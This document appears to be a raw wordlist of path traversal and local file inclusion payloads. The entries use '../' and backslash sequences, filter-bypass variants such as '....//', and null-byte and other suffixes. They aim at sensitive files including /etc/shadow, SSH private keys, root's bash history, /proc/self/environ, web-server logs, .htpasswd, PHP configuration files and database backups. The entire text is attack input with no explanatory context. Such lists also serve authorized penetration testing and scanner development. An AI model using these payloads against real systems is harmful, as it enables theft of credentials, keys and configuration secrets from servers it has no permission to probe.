../../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
/etc/passwd
/etc/passwd%00
/etc/passwd%00.jpg
/etc/passwd?
/etc/passwd%20
/etc/passwd%09
/etc/passwd%0a
/etc/passwd%0d
/etc/passwd.
/etc/passwd..
/etc/passwd...
./etc/passwd
.../etc/passwd
..../etc/passwd
.....//etc/passwd
......///etc/passwd
/etc/passwd/
/etc/passwd//
/etc/passwd///
/etc/passwd\
/etc/passwd\\
/etc/passwd\\\
..\..\..\..\..\etc\passwd
..\..\..\..\etc\passwd
..\..\..\etc\passwd
..\..\etc\passwd
.\etc\passwd
C:\Windows\System32\drivers\etc\hosts
C:\boot.ini
C:\Windows\win.ini
../../../../../../etc/hosts
../../../etc/hosts
../../etc/hosts
/etc/hosts
/etc/hosts%00
/etc/hosts?
/etc/hosts%20
/etc/hosts.
/etc/hosts..
../../../../../../etc/shadow
../../../etc/shadow
/etc/shadow
/etc/shadow%00
/etc/shadow?
/etc/shadow%20
../../../../../../etc/group
../../../etc/group
/etc/group
/etc/group%00
/etc/group?
../../../../../../etc/passwd%00
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
/etc/passwd%00.txt
/etc/passwd%00.html
/etc/passwd%00.php
....//....//....//etc/passwd
....//....//etc/passwd
....//etc/passwd
....\/....\/....\/etc/passwd
....\/....\/etc/passwd
....\/etc/passwd
../../../../../../var/www/html/config.php
../../../var/www/html/config.php
/var/www/html/config.php
/var/www/html/config.php%00
/var/www/html/config.php?
../../../../../../var/log/apache2/access.log
../../../var/log/apache2/access.log
/var/log/apache2/access.log
/var/log/apache2/access.log%00
/var/log/apache2/access.log?
../../../../../../var/log/nginx/access.log
../../../var/log/nginx/access.log
/var/log/nginx/access.log
/var/log/nginx/access.log%00
/var/log/nginx/access.log?
../../../../../../proc/self/environ
../../../proc/self/environ
/proc/self/environ
/proc/self/environ%00
/proc/self/environ?
../../../../../../proc/self/cmdline
../../../proc/self/cmdline
/proc/self/cmdline
/proc/self/cmdline%00
/proc/self/cmdline?
../../../../../../proc/version
../../../proc/version
/proc/version
/proc/version%00
/proc/version?
../../../../../../root/.bash_history
../../../root/.bash_history
/root/.bash_history
/root/.bash_history%00
/root/.bash_history?
../../../../../../home/user/.ssh/id_rsa
../../../home/user/.ssh/id_rsa
/home/user/.ssh/id_rsa
/home/user/.ssh/id_rsa%00
/home/user/.ssh/id_rsa?
../../../../../../var/log/auth.log
../../../var/log/auth.log
/var/log/auth.log
/var/log/auth.log%00
/var/log/auth.log?
../../../../../../var/log/messages
../../../var/log/messages
/var/log/messages
/var/log/messages%00
/var/log/messages?
../../../../../../var/mail/user
../../../var/mail/user
/var/mail/user
/var/mail/user%00
/var/mail/user?
../../../../../../etc/httpd/logs/access_log
../../../etc/httpd/logs/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/access_log%00
/etc/httpd/logs/access_log?
../../../../../../etc/hostname
../../../etc/hostname
/etc/hostname
/etc/hostname%00
/etc/hostname?
../../../../../../etc/issue
../../../etc/issue
/etc/issue
/etc/issue%00
/etc/issue?
../../../../../../etc/motd
../../../etc/motd
/etc/motd
/etc/motd%00
/etc/motd?
../../../../../../etc/resolv.conf
../../../etc/resolv.conf
/etc/resolv.conf
/etc/resolv.conf%00
/etc/resolv.conf?
../../../../../../etc/fstab
../../../etc/fstab
/etc/fstab
/etc/fstab%00
/etc/fstab?
../../../../../../etc/crontab
../../../etc/crontab
/etc/crontab
/etc/crontab%00
/etc/crontab?
../../../../../../etc/passwd~
../../../etc/passwd~
/etc/passwd~
/etc/passwd~%00
/etc/passwd~?
../../../../../../etc/shadow~
../../../etc/shadow~
/etc/shadow~
/etc/shadow~%00
/etc/shadow~?
../../../../../../etc/group~
../../../etc/group~
/etc/group~
/etc/group~%00
/etc/group~?
../../../../../../var/www/html/.htpasswd
../../../var/www/html/.htpasswd
/var/www/html/.htpasswd
/var/www/html/.htpasswd%00
/var/www/html/.htpasswd?
../../../../../../var/www/html/database.php
../../../var/www/html/database.php
/var/www/html/database.php
/var/www/html/database.php%00
/var/www/html/database.php?
../../../../../../var/www/html/admin/config.php
../../../var/www/html/admin/config.php
/var/www/html/admin/config.php
/var/www/html/admin/config.php%00
/var/www/html/admin/config.php?
../../../../../../var/www/html/include/config.php
../../../var/www/html/include/config.php
/var/www/html/include/config.php
/var/www/html/include/config.php%00
/var/www/html/include/config.php?
../../../../../../var/www/html/inc/config.php
../../../var/www/html/inc/config.php
/var/www/html/inc/config.php
/var/www/html/inc/config.php%00
/var/www/html/inc/config.php?
../../../../../../var/www/html/config/database.php
../../../var/www/html/config/database.php
/var/www/html/config/database.php
/var/www/html/config/database.php%00
/var/www/html/config/database.php?
../../../../../../var/www/backup/config.php.bak
../../../var/www/backup/config.php.bak
/var/www/backup/config.php.bak
/var/www/backup/config.php.bak%00
/var/www/backup/config.php.bak?
../../../../../../var/www/backup/database.sql
../../../var/www/backup/database.sql
/var/www/backup/database.sql
/var/www/backup/database.sql%00
/var/www/backup/database.sql?
../../../../../../tmp/test.txt
../../../tmp/test.txt
/tmp/test.txt
/tmp/test.txt%00
/tmp/test.txt?
../../../../../../var/tmp/test.txt
../../../var/tmp/test.txt
/var/tmp/test.txt
/var/tmp/test.txt%00
/var/tmp/test.txt?
../../../../../../etc/passwd#
../../../etc/passwd#
/etc/passwd#
/etc/passwd#?
../../../../../../etc/passwd/
../../../etc/passwd/
/etc/passwd/
/etc/passwd/?
../../../../../../etc/passwd\
../../../etc/passwd\
/etc/passwd\
/etc/passwd\?

